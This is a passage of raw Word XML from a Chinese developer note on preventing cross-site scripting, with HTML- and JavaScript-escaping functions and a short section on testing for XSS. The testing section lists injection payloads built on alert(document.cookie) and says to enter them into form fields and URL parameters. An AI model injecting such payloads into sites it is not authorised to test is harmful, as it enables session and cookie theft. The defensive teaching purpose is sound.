      <w:r w:rsidRPr="005F7FE5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</w:rPr>
        <w:t>commons-lang.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10228402" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7FE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 xml:space="preserve">StringEscapeUtils.escapeHtml(str);// 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汉字会转换成对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="005F7FE5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ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="005F7FE5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码，空格不转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F548B" w14:textId="77777777" w:rsidR="000C0A3F" w:rsidRPr="000C0A3F" w:rsidRDefault="000C0A3F" w:rsidP="000C0A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0C0A3F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自己</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0A3F">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实现转换</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0A3F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，只</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0A3F">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>转换</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0A3F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部分字符</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8505" w:type="dxa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0C0A3F" w:rsidRPr="000C0A3F" w14:paraId="1E323FCD" w14:textId="77777777" w:rsidTr="00181E7D">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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647B4165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private</w:t>
            </w:r>
            <w:r w:rsidRPr="00B02498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static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String htmlEncode(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char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c) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6788A4EB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switch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(c) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002BB46D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case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'&amp;'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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B5600A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"&amp;amp;"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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74321A13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case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'&lt;'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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411F4D34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"&amp;lt;"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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E198EF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case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'&gt;'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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B4E8E2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"&amp;gt;"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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0456FAB3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case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'"'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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17DC5B47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"&amp;quot;"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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA679BF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case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' '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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C99951D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"&amp;nbsp;"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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AFA55C5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default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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20B95769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 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c + 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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015B1FE7" w14:textId="77777777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 }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE5BFA9" w14:textId="3AF768A2" w:rsidR="000C0A3F" w:rsidRPr="000C0A3F" w:rsidRDefault="000C0A3F" w:rsidP="00E8614C">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:beforeLines="20" w:before="65" w:afterLines="20" w:after="65" w:line="160" w:lineRule="exact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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF6ADCB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/**</w:t>
            </w:r>
            <w:r w:rsidRPr="00B02498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对传入的字符串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  <w:u w:val="single"/>
              </w:rPr>
              <w:t>str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进行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  <w:u w:val="single"/>
              </w:rPr>
              <w:t>Html</w:t>
            </w:r>
            <w:r w:rsidRPr="00B02498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encode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转换</w:t>
            </w:r>
            <w:r w:rsidRPr="00B02498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color w:val="3F5FBF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>*/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44761C7D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public</w:t>
            </w:r>
            <w:r w:rsidRPr="00B02498">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs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static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String htmlEncode(String str) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022FB5CA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if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(str ==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null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|| str.trim().equals(</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0A3F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>""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))  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str;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5DB9B5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 StringBuilder encodeStrBuilder =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new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StringBuilder();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55AA3EDB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for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int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i = 0, len = str.length(); i &lt; len; i++) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3A29E7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    encodeStrBuilder.append(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B02498">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>htmlEncode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(str.charAt(i)));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="756674A8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 }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7696470A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  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B02498">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00B02498">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w: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encodeStrBuilder.toString();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E304E21" w14:textId="77777777" w:rsidR="000C0A3F" w:rsidRPr="000C0A3F" w:rsidRDefault="000C0A3F" w:rsidP="005755AC">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:beforeLines="20" w:before="65" w:afterLines="20" w:after="65" w:line="180" w:lineRule="exact"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C0A3F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="427C3425" w14:textId="5DB8A04F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原则：　不相信客户输入的数据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br/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注意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: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攻击代码不一定在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&lt;script&gt;&lt;/script&gt;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中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C2830" w14:textId="326EFD9F" w:rsidR="001E762A" w:rsidRDefault="00181E7D" w:rsidP="005F7FE5">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二：调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D2108F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var HtmlUtil = {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD22D4B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/*1.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用浏览器内部转换器实现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html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转码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*/  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63206CF0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htmlEncode:function (html){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E001318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333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        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//1.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首先动态创建一个容器标签元素，如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DIV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E96CBE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var temp = document.createElement ("div");  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD7396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//2.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然后将要转换的字符串设置为这个元素的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innerText(ie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支持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)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或者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textContent(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火狐，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google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支持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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22483509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(temp.textContent != undefined ) ? (temp.textContent = html) : (temp.innerText = html);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47275157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//3.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最后返回这个元素的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innerHTML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，即得到经过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HTML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编码转换的字符串了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6863DA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var output = temp.innerHTML;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB7598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temp = null;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B0211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return output;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B0258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},  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5BE58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/*2.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用浏览器内部转换器实现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html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解码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*/  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F3D750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htmlDecode:function (text){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A97EB62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//1.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首先动态创建一个容器标签元素，如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DIV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112DE7D8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var temp = document.createElement("div");  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292409C2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//2.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然后将要转换的字符串设置为这个元素的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innerHTML(ie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，火狐，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google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都支持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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66972B78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temp.innerHTML = text;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506B8C2F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//3.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最后返回这个元素的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innerText(ie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支持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)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或者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textContent(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火狐，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google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支持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)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，即得到经过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HTML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解码的字符串了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EDCF00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var output = temp.innerText || temp.textContent;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B0A5D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temp = null;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C398A0C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    return output;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6671B64A" w14:textId="77777777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 xml:space="preserve">    }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670498B2" w14:textId="336B1D1C" w:rsidR="00181E7D" w:rsidRDefault="00181E7D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>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A237BB" w14:textId="16B55C50" w:rsidR="00181E7D" w:rsidRDefault="00181E7D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测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FAA25A" w14:textId="79DB9E88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>var url=document.location.href;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 //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首先要获取输入的浏览器地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF6812" w14:textId="06F4DAF8" w:rsidR="00181E7D" w:rsidRPr="00181E7D" w:rsidRDefault="00181E7D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>var encod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eHtml = </w:t>
      </w:r>
      <w:r w:rsidRPr="00920AD0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HtmlUtil.htmlEncode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(url</w:t>
      </w:r>
      <w:r w:rsidRPr="00181E7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);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 // </w:t>
      </w:r>
      <w:r w:rsidR="00920AD0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后进行转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码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3E99A" w14:textId="3308853C" w:rsidR="00181E7D" w:rsidRDefault="00181E7D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181E7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alert(encodeHtml);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B3580" w14:textId="77777777" w:rsidR="001E2E38" w:rsidRPr="00181E7D" w:rsidRDefault="001E2E38" w:rsidP="00181E7D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3151E915" w14:textId="77777777" w:rsidR="001E762A" w:rsidRPr="001E762A" w:rsidRDefault="001E762A" w:rsidP="001E762A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="A5A5A5"/>
        <w:spacing w:before="150" w:after="150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</w:pPr>
      <w:bookmarkStart w:id="4" w:name="xssSearch"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="001E762A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如何</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67A5BE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方法一：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查看代码，查找关键的变量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, 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客户端将数据传送给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Web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服务端一般通过三种方式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Querystring, Form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表单，以及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cookie.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例如在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ASP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的程序中，通过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Request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对象获取客户端的变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E3F11" w14:textId="77777777" w:rsidR="001E762A" w:rsidRPr="001E762A" w:rsidRDefault="001E762A" w:rsidP="001E76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E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;%</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>strUserCode =  Request.QueryString(“code”);</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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1E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strUser =  Request.Form(“USER”);</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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1E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strID =    Request.Cookies(“ID”);</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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1E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D64F3C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假如变量没有经过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htmlEncode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处理，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那么这个变量就存在一个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XSS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漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA8565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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC29F1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 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方法二：　准备测试脚本，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0071C983" w14:textId="77777777" w:rsidR="001E762A" w:rsidRPr="001E762A" w:rsidRDefault="001E762A" w:rsidP="001E76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E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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1E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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1E762A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5F5F5"/>
        </w:rPr>
        <w:t>alert(document.cookie)</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A"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 w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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1E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!--</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>"onclick="alert(document.cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C5A98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 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在网页中的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Textbox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或者其他能输入数据的地方，输入这些测试脚本，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看能不能弹出对话框，能弹出的话说明存在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XSS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漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C2EF2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 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在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URL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中查看有那些变量通过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URL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把值传给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Web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服务器，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把这些变量的值退换成我们的测试的脚本。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然后看我们的脚本是否能执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E1C1F5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DAB37F" w14:textId="77777777" w:rsidR="001E762A" w:rsidRPr="001E762A" w:rsidRDefault="001E762A" w:rsidP="001E762A">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="150" w:after="15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1E762A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法三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: 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自动化测试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XSS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漏洞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br/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现在已经有很多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XSS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扫描工具了。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实现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XSS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自动化测试非常简单，只需要用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HttpWebRequest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类。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把包含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xss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测试脚本。发送给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Web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服务器。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然后查看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HttpWebResponse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中，我们的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XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>测试脚本是否已经注入进去了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E105131" w14:textId="77777777" w:rsidR="001E762A" w:rsidRDefault="001E762A" w:rsidP="005F7FE5">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2153DF" w14:textId="77777777" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="005F7FE5">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF7D543" w14:textId="77777777" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>//使用“\”对特殊字符进行转义，除数字字母之外，小于127使用16进制“\xHH”的方式进行编码，大于用unicode（非常严格模式）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B84E767" w14:textId="1CF87B02" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>var JavaScriptEncode = function(str){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AE141D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var hex=new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6EDB9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function changeTo16Hex(charCode){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB69E7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return "\\x" + charCode.charCodeAt(0).toString(16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3480AF3F" w14:textId="56B5D6F7" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08160CD0" w14:textId="3B62C94A" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    function encodeCharx(original) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F63AA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var found = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113560F4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var thecharchar = original.charAt(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D53846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var thechar = original.charCodeAt(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCA1C8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switch(thecharchar) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0037530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'\n': return "\\n"; break; //newline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578A6B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'\r': return "\\r"; break; //Carriage return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A12B73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'\'': return "\\'"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220CC90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'"': return "\\\""; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F87BFE4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'\&amp;': return "\\&amp;"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9853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'\\': return "\\\\"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D769D7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'\t': return "\\t"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47042A0F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'\b': return "\\b"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CE49D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'\f': return "\\f"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F335B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'/': return "\\x2F"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F7B73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'&lt;': return "\\x3C"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600FD4CD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case '&gt;': return "\\x3E"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A639736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default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ACCB2F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found=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FB986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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33116D99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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA64E7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if(!found){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1BFFF3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if(thechar &gt; 47 &amp;&amp; thechar &lt; 58){ //数字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636B7E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return original;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA924F" w14:textId="57D102D5" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BBCF8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if(thechar &gt; 64 &amp;&amp; thechar &lt; 91){ //大写字母</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14ED98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return original;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC96911" w14:textId="08669540" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0AEAD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if(thechar &gt; 96 &amp;&amp; thechar &lt; 123){ //小写字母</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA2CA3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return original;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73557D07" w14:textId="585D934E" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            } </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="31AA76A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if(thechar&gt;127) { //大于127用unicode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73967094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var c = thechar;</w:t>
      </w:r>
    </w:p>
